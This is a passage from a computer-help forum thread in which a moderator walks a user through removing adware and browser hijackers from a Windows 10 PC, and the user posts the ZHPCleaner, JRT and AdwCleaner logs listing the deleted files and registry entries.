              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\e02a6 e14de41bb3a_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\e0ed0 8553af7306e_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\e13b0 7328efce493_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\e1468 92e61143eaa_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\e2606 086d8c9a407_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\e2a7f 951cfb7cde5_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\e2ac4 0a8d9265dc0_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\e2bd0 1c4b4b5d312_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\e446f 090d861f51c_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\e4ee5 cdba7efe4a2_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\e512b 13fdc10aea0_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\e6d91 6e5e291db12_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\eb91b 8b9aaafe95a_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\ebfeb e4d5da3f5c7_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\ec9a7 f6de52f831b_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\ef7b9 cce8af6a11a_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f0a2e 7f6e19f7104_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f0c77 1dce7c5a5ac_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f11b3 2ed936d1090_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f1c10 9f9354d996c_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f24cc 08a3edd1b01_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f2b5a 353e9188b42_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f3329 f06499ce4f8_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f35ac de6d72ed432_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f3e4e 11b98723bf4_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f5bc5 6a21442d1e6_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f66d4 66bcebd4d30_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f8181 eef2ee2a72b_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f83fb 1ab0a455c30_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f89ea 048ec0c48cc_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\f9340 39d7527700b_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\fbe3c a3321be93fc_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\fe8bb c23eb9b620a_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\feeee 8e32988e6d2_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\ff0e0 2c0624bf295_0 → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\index → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\index-dir\the-real-index → Deleted
              [PUP.WikiThemes][Folder] C:\Users\ASUS\AppData\Local\WikiThemes\Cache\index-dir → Deleted
              [PUP.WikiThemes][Folder] C:\Users\ASUS\AppData\Local\WikiThemes\Cache → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\cookies → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\cookies-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\file__0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\file__0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_cdns.eu1.gigya.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_cdns.eu1.gigya.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_commons.wikimedia.org_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_commons.wikimedia.org_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_disqus.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_disqus.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_en.wikipedia.org_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_en.wikipedia.org_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_messengertime.en.softonic.com_0.loca lstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_messengertime.en.softonic.com_0.loca lstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_ms-my.facebook.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_ms-my.facebook.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_news.google.co.id_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_news.google.co.id_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_news.google.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_news.google.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_secure-ds.serving-sys.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_secure-ds.serving-sys.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_wiki2.org_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_wiki2.org_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.acps.k12.va.us_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.acps.k12.va.us_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.britannica.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.britannica.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.facebook.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.facebook.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.google.co.id_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.google.co.id_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.google.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.google.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.merriam-webster.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.merriam-webster.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.tripadvisor.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.tripadvisor.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.youtube.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\https_www.youtube.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\http_search.snapdo.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\http_search.snapdo.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\http_www.bola.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\http_www.bola.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\http_www.skysports.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\http_www.skysports.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\http_www.sofascore.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\http_www.sofascore.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\http_www.uefa.com_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\http_www.uefa.com_0.localstorage-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\http_www.ui.ac.id_0.localstorage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage\http_www.ui.ac.id_0.localstorage-journal → Deleted
              [PUP.WikiThemes][Folder] C:\Users\ASUS\AppData\Local\WikiThemes\Local Storage → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Web Data → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\Web Data-journal → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\WebRTCIdent ityStore → Deleted
              [PUP.WikiThemes][File] C:\Users\ASUS\AppData\Local\WikiThemes\WebRTCIdent ityStore-journal → Deleted
              [Adw.FakeBro][Folder] C:\Program Files (x86)\Explorer → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\en-GB\ieinstal.exe.mui → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\en-GB\iexplore.exe.mui → Deleted
              [Adw.FakeBro][Folder] C:\Program Files (x86)\Explorer\en-GB → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\en-US\hmmapi.dll.mui → Deleted
              [Adw.FakeBro][Folder] C:\Program Files (x86)\Explorer\en-US → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\ExtExport.exe → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\hmmapi.dll → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\ie9props.propdesc → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\ieinstal.exe → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\ielowutil.exe → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\IEShims.dll → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\iexplore.exe → Deleted
              [Adw.FakeBro][Folder] C:\Program Files (x86)\Explorer\images → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\pdmain → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\SIGNUP\install.ins → Deleted
              [Adw.FakeBro][Folder] C:\Program Files (x86)\Explorer\SIGNUP → Deleted
              [Adw.FakeBro][File] C:\Program Files (x86)\Explorer\sqmapi.dll → Deleted

              ¤¤¤ WMI : 0 ¤¤¤

              ¤¤¤ Hosts File : 0 ¤¤¤

              ¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

              ¤¤¤ Web browsers : 3 ¤¤¤
              [PUP.Gen1|PUM.SearchEngine][Firefox:Config] dvwdtm10.default : user_pref(“browser.search.searchengine.hp”, " Redirecting... “); → Deleted
              [PUP.Gen1|PUM.SearchEngine][Firefox:Config] dvwdtm10.default : user_pref(“browser.search.searchengine.sp”, " Redirecting... {searchTerms}&type=sp&uid=HGSTXHTS541010A9E680_JD1 008DM20840W20840WX&z=4961d5db2a435579c59990eg4zabe m5gbcbebg4tfe”); → Deleted
              [PUP.Gen1|PUM.SearchEngine][Firefox:Config] dvwdtm10.default : user_pref(“browser.search.searchengine.url”, " Redirecting... {searchTerms}&type=sp&uid=HGSTXHTS541010A9E680_JD1 008DM20840W20840WX&z=4961d5db2a435579c59990eg4zabe m5gbcbebg4tfe"); → Deleted

              ¤¤¤ MBR Check : ¤¤¤
              +++++ PhysicalDrive0: HGST HTS541010A9E680 +++++
              — User —
              [MBR] f024d7f8a04739faefbe732bf62ec44e
              [BSP] 7ff5b3512b8eb6fefda35768752dcede : Windows Vista/7/8 MBR Code
              Partition table:
              0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 500 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
              1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1026048 | Size: 127073 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
              2 - [XXXXXX] EXTEN-LBA (0xf) [VISIBLE] Offset (sectors): 261271552 | Size: 122427 MB
              3 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 512002048 | Size: 703866 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
              User = LL1 … OK
              User = LL2 … OK

              Comment

              • Malnutrition
                PCHF Moderator
                • Jul 2016
                • 7045

                #8
                Clean up temp files and reduce startup load with CCleaner.


                Note: This tool will clean your browsing history as well.
                [ul]
                [li]Download CCleaner from here.[/li][li]After install Click Options.[/li][li]Go to monitoring.[/li][li]Uncheck All Monitoring items.[/li][li]Go to advanced – Click close program after cleaning.[/li][li]Go to settings – click run ccleaner when the computer starts.[/li][li]Now that you have ccleaner installed and set-up:[/li][li]Open the program.[/li][li]Go to Tools[/li][li]Go to Startup[/li][li]Now double click each item. To Disable.[/li][li]Leave only your antivirus enabled.[/li][li]Then disable All items in your scheduled task as well.[/li][li]Unless they are related to windows defender.Or your antivirus.[/li][li]Reboot the machine.[/li][/ul]

                ZHP Scan.

                Please download Zhp Cleaner to your desktop. Right Click the icon and select run as administrator.
                1. Once you have started the program, you will need to click the scanner button.

                [IMG alt="EgsT69u" width="602px" height="129px"]https://windowsinstructed.com/wp-content/uploads/2015/06/EgsT69u.png[/IMG]

                The program will close all open browsers!
                3. Once the scan is completed, the you will want to click the Repair button.
                [URL unfurl="true"]http://windowsinstructed.com/wp-content/uploads/2015/06/6QJjV50.png[/URL]

                At the end of the process you may be asked to reboot your machine. After you reboot a report will open on your desktop.

                Copy and paste the report here in your next reply.

                JRT Scan.


                Please download Junkware Removal Tool and save it on your desktop.

                [ul]
                [li]Shut down your anti-virus, anti-spyware, and firewall software now to avoid potential conflicts.[/li][li]Run the tool by double-clicking it. If you are using Windows Vista or Windows 7, right-click it and select Run as administrator.[/li][li]The tool will open and start scanning your system.[/li][li]Please be patient as this can take a while to complete depending on your system’s specifications.[/li][li]On completion, a log is saved to your desktop and will automatically open.[/li][li]Please post the JRT log.[/li][/ul]
                Adware Cleaner Scan.

                Please download AdwCleaner by Xplode onto your desktop.

                [ul]
                [li]Close all open programs and internet browsers.[/li][li]Double click on adwcleaner.exe to run the tool.[/li][li]Click on Scan button.[/li][li]When the scan has finished click on Clean button.[/li][li]Your computer will be rebooted automatically. A text file will open after the restart.[/li][li]Please post the contents of that logfile with your next reply.[/li][li]You can find the logfile at C:\AdwCleaner[S1].txt as well.[/li][/ul]


                Let’s have a fresh look at your system after the above scans please.


                ZHP Diag Scan

                Download ZHP Diag to your desktop.
                1. Right Click Run as Admin.
                  2. Click the Scanner button.



                When complete please push the report button.
                A notepad will open… copy and paste the report in your next reply.

                Comment

                • herrick
                  PCHF Member
                  • Mar 2017
                  • 55

                  #9
                  ZHP CLEANER

                  ~ ZHPCleaner v2017.3.31.56 by Nicolas Coolman (2017/03/31)
                  ~ Run by ASUS (Administrator) (01/04/2017 06:12:55)
                  ~ Web: https://www.nicolascoolman.com
                  ~ Blog: https://nicolascoolman.eu/
                  ~ Facebook : ZHP
                  ~ State version : Version OK
                  ~ Type : Repair
                  ~ Report : C:\Users\ASUS\Desktop\ZHPCleaner.txt
                  ~ Quarantine : C:\Users\ASUS\AppData\Roaming\ZHP\ZHPCleaner_Reg.t xt
                  ~ UAC : Activate
                  ~ Boot Mode : Normal (Normal boot)
                  Windows 10 Enterprise, 64-bit (Build 14393)

                  —\ Services (1)
                  WINSOCK [Protocol_Catalog9\Catalog_Entries]: Reset the socket that handles the layer TCP/IP =>Hijacker.Winsock

                  —\ Browser internet (0)
                  ~ No malicious or unnecessary items found.

                  —\ Hosts file (1)
                  ~ The hosts file is legitimate (1)

                  —\ Scheduled automatic tasks. (0)
                  ~ No malicious or unnecessary items found.

                  —\ Explorer ( File, Folder) (24)
                  MOVED file: C:\Windows\Prefetch\AMULE.EXE-94605FF9.pf =>Adware.aMULEcustom
                  MOVED file: C:\Windows\Installer\wix{3973721B-C2ED-4505-98B6-752897ECF2F1}.SchedServiceConfig.rmi =>.Superfluous.Empty
                  MOVED file: C:\Windows\Installer\wix{AF599C42-A2E5-4251-B7EE-4925B177CBA7}.SchedServiceConfig.rmi =>.Superfluous.Empty
                  MOVED file: C:\Users\ASUS\AppData\Local\Temp\chrome_installer. log =>.Superfluous.Temporary.Empty
                  MOVED file: C:\Users\ASUS\AppData\Local\Temp\ClearLNK.ini =>.Superfluous.Temporary.Empty
                  MOVED file: C:\Users\ASUS\AppData\Local\Temp\rk_3A64.tmp =>.Superfluous.Temporary.Empty
                  MOVED file: C:\Users\ASUS\AppData\Local\Temp\StructuredQuery.l og =>.Superfluous.Temporary.Empty
                  MOVED file: C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_st.chatango.com_0.localstorage =>PUP.Optional.Chatango
                  MOVED file: C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_st.chatango.com_0.localstorage-journal =>PUP.Optional.Chatango
                  MOVED file: C:\Windows\System32\log\iSafeKrnlCall.log =>.Superfluous.YetAnotherCleaner
                  MOVED folder: C:\Windows\System32\config\systemprofile\AppData\R oaming\Tencent =>.Superfluous.Tencent
                  MOVED folder: C:\Windows\System32\config\systemprofile\AppData\L ocal\CrashRpt =>.Superfluous.CrashReports
                  MOVED folder: C:\Windows\SysWOW64\config\systemprofile\AppData\R oaming\Tencent =>.Superfluous.Tencent
                  MOVED folder: C:\Windows\SysWOW64\config\systemprofile\AppData\L ocal\CrashRpt =>.Superfluous.CrashReports
                  MOVED folder: C:\Windows\Installer\MSI1BE7.tmp- =>.Superfluous.Empty
                  MOVED folder: C:\Windows\Installer\MSI430.tmp- =>.Superfluous.Empty
                  MOVED folder: C:\Windows\Installer\MSI5D21.tmp- =>.Superfluous.Empty
                  MOVED folder: C:\Windows\Installer\MSI60FB.tmp- =>.Superfluous.Empty
                  MOVED folder: C:\Windows\Installer\MSI7201.tmp- =>.Superfluous.Empty
                  MOVED folder: C:\Windows\Installer\MSIAD39.tmp- =>.Superfluous.Empty
                  MOVED folder: C:\Windows\Installer\MSIB886.tmp- =>.Superfluous.Empty
                  MOVED folder: C:\Windows\Installer\MSIC0A9.tmp- =>.Superfluous.Empty
                  MOVED folder: C:\Windows\Installer\MSICDC9.tmp- =>.Superfluous.Empty
                  MOVED folder: C:\Windows\Installer\MSIFE13.tmp- =>.Superfluous.Empty

                  —\ Registry ( Key, Value, Data) (16)
                  REPLACED : HKLM64\SYSTEM\CurrentControlSet\Services\WinSock2\ Parameters\Protocol_Catalog9\Catalog_Entries\00000 0000001 [C:\Windows\System32\networkdlllsp.dll (Not File)] =>Hijacker.Winsock
                  REPLACED : HKLM64\SYSTEM\CurrentControlSet\Services\WinSock2\ Parameters\Protocol_Catalog9\Catalog_Entries\00000 0000002 [C:\Windows\System32\networkdlllsp.dll (Not File)] =>Hijacker.Winsock
                  REPLACED : HKLM64\SYSTEM\CurrentControlSet\Services\WinSock2\ Parameters\Protocol_Catalog9\Catalog_Entries\00000 0000003 [C:\Windows\System32\networkdlllsp.dll (Not File)] =>Hijacker.Winsock
                  REPLACED : HKLM64\SYSTEM\CurrentControlSet\Services\WinSock2\ Parameters\Protocol_Catalog9\Catalog_Entries\00000 0000004 [C:\Windows\System32\networkdlllsp.dll (Not File)] =>Hijacker.Winsock
                  REPLACED : HKLM64\SYSTEM\CurrentControlSet\Services\WinSock2\ Parameters\Protocol_Catalog9\Catalog_Entries\00000 0000005 [C:\Windows\System32\networkdlllsp.dll (Not File)] =>Hijacker.Winsock
                  REPLACED : HKLM64\SYSTEM\CurrentControlSet\Services\WinSock2\ Parameters\Protocol_Catalog9\Catalog_Entries\00000 0000006 [C:\Windows\System32\networkdlllsp.dll (Not File)] =>Hijacker.Winsock
                  REPLACED : HKLM64\SYSTEM\CurrentControlSet\Services\WinSock2\ Parameters\Protocol_Catalog9\Catalog_Entries\00000 0000007 [C:\Windows\System32\networkdlllsp.dll (Not File)] =>Hijacker.Winsock
                  DELETED key*: HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Ap plication\WinSnare =>.Superfluous.WinSnare
                  DELETED key*: [X64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uni nstall\0aa2d831c87854a3a60bfe212a041afb [Social2Search] =>PUP.Optional.Social2Search
                  DELETED key*: [X64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ins taller\UserData\S-1-5-18\Components\24C995FA5E2A15247BEE945257D29017 [C:\Program Files (x86)\Hotspot Shield\bin\CrashRpt1403.dll] =>.Superfluous.CrashReports
                  DELETED key*: [X64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ins taller\UserData\S-1-5-18\Components\24C995FA5E2A15247BEE94525E20E902 [C:\Program Files (x86)\Hotspot Shield\bin\crashrpt_lang.ini] =>.Superfluous.CrashReports
                  DELETED key*: [X64] HKLM\SOFTWARE\Wow6432Node\amule-custom [246] =>Adware.aMULEcustom
                  DELETED key*: [X64] HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\BikaQ_ RASAPI32 =>.Superfluous.BikaQ
                  DELETED key*: [X64] HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\BikaQ_ RASMANCS =>.Superfluous.BikaQ
                  DELETED key*: HKCU\SOFTWARE\FC4B6034E5E98B798B7BE2677DCFC16F =>Hijacker.Browser
                  DELETED key*: [X64] HKLM\SOFTWARE\FC4B6034E5E98B798B7BE2677DCFC16F =>Hijacker.Browser

                  —\ Summary of the elements found (12)
                  Redirecting... =>Hijacker.Winsock
                  aMULEcustom, Logiciel Publicitaire (Adware). - ZAM =>Adware.aMULEcustom
                  Logiciels Potentiellement Superflus (LPS). - ZAM =>.Superfluous.Empty
                  Logiciels Potentiellement Superflus (LPS). - ZAM =>.Superfluous.Temporary.Empty
                  Le repaquetage ou l'empaquetage logiciel peut représenter un risque de sécurité - ZAM =>PUP.Optional.Chatango
                  Logiciels Potentiellement Superflus (LPS). - ZAM =>.Superfluous.YetAnotherCleaner
                  Tencent AddressBar, Barre d’outils de navigateur. - ZAM =>.Superfluous.Tencent
                  Logiciels Potentiellement Superflus (LPS). - ZAM =>.Superfluous.CrashReports
                  WinSnare, Logiciel Potentiellement Superflu. - ZAM =>.Superfluous.WinSnare
                  Social2Search, Logiciel Potentiellement Indésirable. - ZAM =>PUP.Optional.Social2Search
                  BikaQ, Logiciel Potentiellement Superflu. - ZAM =>.Superfluous.BikaQ
                  Hijacker Browser, un pirate de navigateur internet. - ZAM =>Hijacker.Browser

                  —\ Other deletions. (50)
                  ~ Registry Keys Tracing deleted (50)
                  ~ Remove the old reports ZHPCleaner. (0)

                  —\ Result of repair
                  ~ Repair carried out successfully
                  ~ Browser not found (Mozilla Firefox)
                  ~ Browser not found (Opera Software)
                  ~ The system has been restarted.

                  —\ Statistics
                  ~ Items scanned : 471
                  ~ Items found : 0
                  ~ Items cancelled : 0
                  ~ Items repaired : 41

                  ~ End of clean in 00h00mn15s
                  ~====================
                  ZHPCleaner-[R]-01042017-06_13_10.txt
                  ZHPCleaner
                  –01042017-06_07_49.txt

                  JRT
                  Code:
                  Junkware Removal Tool (JRT) by Malwarebytes
                  Version: 8.1.2 (03.10.2017)
                  Operating System: Windows 10 Pro x64
                  Ran by ASUS (Limited) on Sat 04/01/2017 at  6:20:00.91
                  File System: 3

                  Successfully deleted: C:\Users\ASUS\AppData\Roaming\wyupdate au (Folder)
                  Successfully deleted: C:\Users\Public\Desktop\hotspot shield.lnk (Shortcut)
                  Successfully deleted: C:\Windows\wininit.ini (File)

                  Deleted the following from C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Prof iles\dvwdtm10.default\prefs.js
                  user_pref(browser.search.searchengine.uid, HGSTXHTS541010A9E680_JD1008DM20840W20840WX);
                  user_pref(browser.urlbar.suggest.searches, true);

                  Registry: 4

                  Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\Main\SearchAssistant (Registry Value)
                  Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\Search\Default_Search_URL (Registry Value)
                  Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchUrl\Default (Registry Value)
                  Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\SearchUrl\Default (Registry Value)
                  Code:
                  Scan was completed on Sat 04/01/2017 at  6:22:05.95
                  End of JRT log
                  ADW CLEANER
                  [HEADING=1]AdwCleaner v6.045 - Logfile created 01/04/2017 at 06:30:15[/HEADING]
                  [HEADING=1]Updated on 28/03/2017 by Malwarebytes[/HEADING]
                  [HEADING=1]Database : 2017-03-31.1 [Server][/HEADING]
                  [HEADING=1]Operating System : Windows 10 Pro (X64)[/HEADING]
                  [HEADING=1]Username : ASUS - MAMBA[/HEADING]
                  [HEADING=1]Running from : C:\Users\ASUS\Desktop\adwcleaner_6.045.exe[/HEADING]
                  [HEADING=1]Mode: Clean[/HEADING]
                  [HEADING=1]Support : Malwarebytes Help Center[/HEADING]
                  ***** [ Services ] *****

                  ***** [ Folders ] *****

                  [-] Folder deleted: C:\Program Files (x86)\reports

                  ***** [ Files ] *****

                  [-] File deleted: C:\Program Files (x86)\settings.dat
                  [-] File deleted: C:\Users\Public\Documents\temp.dat
                  [-] File deleted: C:\Users\Public\Documents\report.dat

                  ***** [ DLL ] *****

                  ***** [ WMI ] *****

                  ***** [ Shortcuts ] *****

                  ***** [ Scheduled Tasks ] *****

                  ***** [ Registry ] *****

                  [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Ap plication\Application Hosting
                  [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Ap plication\Application Hosting
